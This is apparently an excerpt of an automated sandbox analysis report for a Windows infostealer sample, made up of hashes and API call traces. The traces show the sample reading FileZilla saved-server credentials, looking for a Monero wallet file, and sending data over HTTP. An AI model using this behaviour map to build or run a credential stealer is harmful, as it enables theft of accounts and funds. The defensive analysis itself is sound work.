                  • Instruction ID: 6b0e596b78e941055a436b95e944703faccda36d116e98f190da0e3104e1964f
                  • Opcode Fuzzy Hash: c35bf571a6bfb4931bb885bfa1bad91564278118e584eb4c125a69cdab11b3ec
                  • Instruction Fuzzy Hash: B471D7B29083089FE3147F29DC4476AF7E6EB94720F0A893CE6D443784EA396854C687
                  Function 005D8F91 Relevance: .2, Instructions: 173COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.2102186174.000000000053E000.00000040.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                  • Associated: 00000000.00000002.2101914382.00000000002E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.00000000002E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.0000000000391000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.000000000039D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.00000000003C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102564814.00000000007DC000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102701995.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102725282.0000000000977000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2e0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 210859aff19b5d716a17995cbd10c641904cfd6aad0ec0057abb3b18ce25bfe1
                  • Instruction ID: d3a769ef61d2091d845cc8ec9b816f34c0adcb44a4e0c7dd803b35c27df608ff
                  • Opcode Fuzzy Hash: 210859aff19b5d716a17995cbd10c641904cfd6aad0ec0057abb3b18ce25bfe1
                  • Instruction Fuzzy Hash: 1C5126F3E082145BF3146E29DCC8766BAD5EB98360F5A863DDAC897784E939580483C6
                  Function 00577E37 Relevance: .2, Instructions: 157COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.2102186174.000000000053E000.00000040.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                  • Associated: 00000000.00000002.2101914382.00000000002E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.00000000002E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.0000000000391000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.000000000039D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.00000000003C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102564814.00000000007DC000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102701995.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102725282.0000000000977000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2e0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: ad9c294d8a3966cd4bddff9af22d0aa781e86b298bde6f369e05ecc3d3a757ec
                  • Instruction ID: 5908150663c27c478cd22b468d0d70b671772dd3958f59acc33ebf45149a61c5
                  • Opcode Fuzzy Hash: ad9c294d8a3966cd4bddff9af22d0aa781e86b298bde6f369e05ecc3d3a757ec
                  • Instruction Fuzzy Hash: 6E41D6B36086009FE308AE29DC8577FF7E6EFD4320F26853DE6C483754EA3958418696
                  Function 00595757 Relevance: .2, Instructions: 156COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.2102186174.000000000053E000.00000040.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                  • Associated: 00000000.00000002.2101914382.00000000002E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.00000000002E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.0000000000391000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.000000000039D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.00000000003C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102564814.00000000007DC000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102701995.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102725282.0000000000977000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2e0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: cf8417f9dab2b3de11d3967eb821b7ad85ca6118c8075d729851b90e8ea2e279
                  • Instruction ID: 5b8bb0ca858fb22cb1db936efec4ddc8e5819037c6482dd242baca3c23fecd6d
                  • Opcode Fuzzy Hash: cf8417f9dab2b3de11d3967eb821b7ad85ca6118c8075d729851b90e8ea2e279
                  • Instruction Fuzzy Hash: F941F7F3B145005FF314EE39EC847AAB6D6EBD4310F1A853CEA88C7784F539980A8295
                  Function 005B90A2 Relevance: .1, Instructions: 146COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.2102186174.000000000053E000.00000040.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                  • Associated: 00000000.00000002.2101914382.00000000002E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.00000000002E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.0000000000391000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.000000000039D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.00000000003C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102564814.00000000007DC000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102701995.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102725282.0000000000977000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2e0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: a5484d66607441ce08bbc911dd8d7dbb7411c2f705692c261a949380b4354884
                  • Instruction ID: 10bf87b43389b2d5fd20e93a09e48458a682dfd33b4cc02ff938be047ba22f07
                  • Opcode Fuzzy Hash: a5484d66607441ce08bbc911dd8d7dbb7411c2f705692c261a949380b4354884
                  • Instruction Fuzzy Hash: 254129F260C3049FE304AE29EC857BABBD5EBD4320F19853DE6D8C3780E67448058696
                  Function 005B9E04 Relevance: .1, Instructions: 136COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.2102186174.000000000053E000.00000040.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                  • Associated: 00000000.00000002.2101914382.00000000002E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.00000000002E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.0000000000391000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.000000000039D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.00000000003C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102564814.00000000007DC000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102701995.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102725282.0000000000977000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2e0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: c4a6b35d261e783b652fa33e77de01e776296213be93c4ff03aa72c89e3178bb
                  • Instruction ID: 76c5e7fc545cfb135734b5faa3a2ab60731520580340182e120db29930c3ae70
                  • Opcode Fuzzy Hash: c4a6b35d261e783b652fa33e77de01e776296213be93c4ff03aa72c89e3178bb
                  • Instruction Fuzzy Hash: D04106B39082209FE3559A29DC007BAB3D5EF84320F16853DDED4D7780EA355C0587C6
                  Function 00678815 Relevance: .1, Instructions: 130COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.2102186174.000000000053E000.00000040.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                  • Associated: 00000000.00000002.2101914382.00000000002E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.00000000002E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.0000000000391000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.000000000039D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.00000000003C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102564814.00000000007DC000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102701995.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102725282.0000000000977000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2e0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 131ee8be36cb96963ed0c148a45ce3674ccd623df2315131e2faa03da6c71434
                  • Instruction ID: 48dde7b23d16001f7ea78ae0b92567aa25a46a52f3667965a51e44e78541bbe6
                  • Opcode Fuzzy Hash: 131ee8be36cb96963ed0c148a45ce3674ccd623df2315131e2faa03da6c71434
                  • Instruction Fuzzy Hash: 0E4168F3E086108BE304AA29EC4572BB7D6EBD4320F16C63CDAC953784E93958058686
                  Function 002F9750 Relevance: .0, Instructions: 15COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101950818.00000000002E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                  • Associated: 00000000.00000002.2101914382.00000000002E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.0000000000391000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.000000000039D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.00000000003C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.000000000053E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102564814.00000000007DC000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102701995.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102725282.0000000000977000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2e0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                  • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                  • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                  • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                  Function 002F0250 Relevance: 68.6, APIs: 29, Strings: 10, Instructions: 366stringmemoryCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 002FA740: lstrcpy.KERNEL32(00300E17,00000000), ref: 002FA788
                    • Part of subcall function 002F8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 002F8E0B
                    • Part of subcall function 002FA920: lstrcpy.KERNEL32(00000000,?), ref: 002FA972
                    • Part of subcall function 002FA920: lstrcat.KERNEL32(00000000), ref: 002FA982
                    • Part of subcall function 002FA8A0: lstrcpy.KERNEL32(?,00300E17), ref: 002FA905
                    • Part of subcall function 002FA9B0: lstrlen.KERNEL32(?,01328BA0,?,\Monero\wallet.keys,00300E17), ref: 002FA9C5
                    • Part of subcall function 002FA9B0: lstrcpy.KERNEL32(00000000), ref: 002FAA04
                    • Part of subcall function 002FA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 002FAA12
                    • Part of subcall function 002FA7A0: lstrcpy.KERNEL32(?,00000000), ref: 002FA7E6
                    • Part of subcall function 002E99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 002E99EC
                    • Part of subcall function 002E99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 002E9A11
                    • Part of subcall function 002E99C0: LocalAlloc.KERNEL32(00000040,?), ref: 002E9A31
                    • Part of subcall function 002E99C0: ReadFile.KERNEL32(000000FF,?,00000000,002E148F,00000000), ref: 002E9A5A
                    • Part of subcall function 002E99C0: LocalFree.KERNEL32(002E148F), ref: 002E9A90
                    • Part of subcall function 002E99C0: CloseHandle.KERNEL32(000000FF), ref: 002E9A9A
                    • Part of subcall function 002F8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 002F8E52
                  • GetProcessHeap.KERNEL32(00000000,000F423F,00300DBA,00300DB7,00300DB6,00300DB3), ref: 002F0362
                  • RtlAllocateHeap.NTDLL(00000000), ref: 002F0369
                  • StrStrA.SHLWAPI(00000000,<Host>), ref: 002F0385
                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00300DB2), ref: 002F0393
                  • StrStrA.SHLWAPI(00000000,<Port>), ref: 002F03CF
                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00300DB2), ref: 002F03DD
                  • StrStrA.SHLWAPI(00000000,<User>), ref: 002F0419
                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00300DB2), ref: 002F0427
                  • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 002F0463
                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00300DB2), ref: 002F0475
                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00300DB2), ref: 002F0502
                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00300DB2), ref: 002F051A
                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00300DB2), ref: 002F0532
                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00300DB2), ref: 002F054A
                  • lstrcat.KERNEL32(?,browser: FileZilla), ref: 002F0562
                  • lstrcat.KERNEL32(?,profile: null), ref: 002F0571
                  • lstrcat.KERNEL32(?,url: ), ref: 002F0580
                  • lstrcat.KERNEL32(?,00000000), ref: 002F0593
                  • lstrcat.KERNEL32(?,00301678), ref: 002F05A2
                  • lstrcat.KERNEL32(?,00000000), ref: 002F05B5
                  • lstrcat.KERNEL32(?,0030167C), ref: 002F05C4
                  • lstrcat.KERNEL32(?,login: ), ref: 002F05D3
                  • lstrcat.KERNEL32(?,00000000), ref: 002F05E6
                  • lstrcat.KERNEL32(?,00301688), ref: 002F05F5
                  • lstrcat.KERNEL32(?,password: ), ref: 002F0604
                  • lstrcat.KERNEL32(?,00000000), ref: 002F0617
                  • lstrcat.KERNEL32(?,00301698), ref: 002F0626
                  • lstrcat.KERNEL32(?,0030169C), ref: 002F0635
                  • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00300DB2), ref: 002F068E
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101950818.00000000002E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                  • Associated: 00000000.00000002.2101914382.00000000002E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.0000000000391000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.000000000039D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.00000000003C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.000000000053E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102564814.00000000007DC000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102701995.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102725282.0000000000977000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2e0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                  • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                  • API String ID: 1942843190-555421843
                  • Opcode ID: a31b81b34e3ccef91c3e7b5dee0b9f0591bfa2c7e4c6df6ec6373168e30c116a
                  • Instruction ID: 106e637ead24e53241aca2a87bb1cf8f3add7b112455f5c5dc59c16a5d7dcb9c
                  • Opcode Fuzzy Hash: a31b81b34e3ccef91c3e7b5dee0b9f0591bfa2c7e4c6df6ec6373168e30c116a
                  • Instruction Fuzzy Hash: DDD133B192010C9BCB14EBF0DD96EFEB378EF14740F444528F606A6095DE74AA1ADF61
                  Function 002E5960 Relevance: 39.0, APIs: 17, Strings: 5, Instructions: 495networkstringmemoryCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 002FA7A0: lstrcpy.KERNEL32(?,00000000), ref: 002FA7E6
                    • Part of subcall function 002E47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 002E4839
                    • Part of subcall function 002E47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 002E4849
                    • Part of subcall function 002FA740: lstrcpy.KERNEL32(00300E17,00000000), ref: 002FA788
                  • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 002E59F8
                  • StrCmpCA.SHLWAPI(?,0132F360), ref: 002E5A13
                  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 002E5B93
                  • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,0132F2C0,00000000,?,01329D38,00000000,?,00301A1C), ref: 002E5E71
                  • lstrlen.KERNEL32(00000000), ref: 002E5E82
                  • GetProcessHeap.KERNEL32(00000000,?), ref: 002E5E93
                  • RtlAllocateHeap.NTDLL(00000000), ref: 002E5E9A
                  • lstrlen.KERNEL32(00000000), ref: 002E5EAF
                  • lstrlen.KERNEL32(00000000), ref: 002E5ED8
                  • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 002E5EF1
                  • lstrlen.KERNEL32(00000000,?,?), ref: 002E5F1B
                  • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 002E5F2F
                  • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 002E5F4C
                  • InternetCloseHandle.WININET(00000000), ref: 002E5FB0
                  • InternetCloseHandle.WININET(00000000), ref: 002E5FBD
                  • HttpOpenRequestA.WININET(00000000,0132F2D0,?,0132EB40,00000000,00000000,00400100,00000000), ref: 002E5BF8
                    • Part of subcall function 002FA9B0: lstrlen.KERNEL32(?,01328BA0,?,\Monero\wallet.keys,00300E17), ref: 002FA9C5
                    • Part of subcall function 002FA9B0: lstrcpy.KERNEL32(00000000), ref: 002FAA04
                    • Part of subcall function 002FA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 002FAA12
                    • Part of subcall function 002FA8A0: lstrcpy.KERNEL32(?,00300E17), ref: 002FA905
                    • Part of subcall function 002FA920: lstrcpy.KERNEL32(00000000,?), ref: 002FA972
                    • Part of subcall function 002FA920: lstrcat.KERNEL32(00000000), ref: 002FA982
                  • InternetCloseHandle.WININET(00000000), ref: 002E5FC7
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101950818.00000000002E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                  • Associated: 00000000.00000002.2101914382.00000000002E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.0000000000391000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.000000000039D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.00000000003C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.000000000053E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102564814.00000000007DC000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102701995.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102725282.0000000000977000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2e0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                  • String ID: "$"$------$------$------
                  • API String ID: 874700897-2180234286
                  • Opcode ID: 2b81780ef70ca60673b592d3e6d88a3502f6ce017944c6ead70c3cb4ceaa9248
                  • Instruction ID: 811be92fbd1f191f73de2396788977f8f19ad70c1c974a3dee7d091f070542bb
                  • Opcode Fuzzy Hash: 2b81780ef70ca60673b592d3e6d88a3502f6ce017944c6ead70c3cb4ceaa9248
                  • Instruction Fuzzy Hash: 9E12CDB183111CABDB15EBA0DC96FEEB378BF14780F504179B20A62091DF706A5ACF65
                  Function 002ECEF0 Relevance: 30.4, APIs: 20, Instructions: 375stringmemoryfileCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 002FA740: lstrcpy.KERNEL32(00300E17,00000000), ref: 002FA788
                    • Part of subcall function 002FA9B0: lstrlen.KERNEL32(?,01328BA0,?,\Monero\wallet.keys,00300E17), ref: 002FA9C5
                    • Part of subcall function 002FA9B0: lstrcpy.KERNEL32(00000000), ref: 002FAA04
                    • Part of subcall function 002FA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 002FAA12
                    • Part of subcall function 002FA8A0: lstrcpy.KERNEL32(?,00300E17), ref: 002FA905
                    • Part of subcall function 002F8B60: GetSystemTime.KERNEL32(00300E1A,01329C18,003005AE,?,?,002E13F9,?,0000001A,00300E1A,00000000,?,01328BA0,?,\Monero\wallet.keys,00300E17), ref: 002F8B86
                    • Part of subcall function 002FA920: lstrcpy.KERNEL32(00000000,?), ref: 002FA972
                    • Part of subcall function 002FA920: lstrcat.KERNEL32(00000000), ref: 002FA982
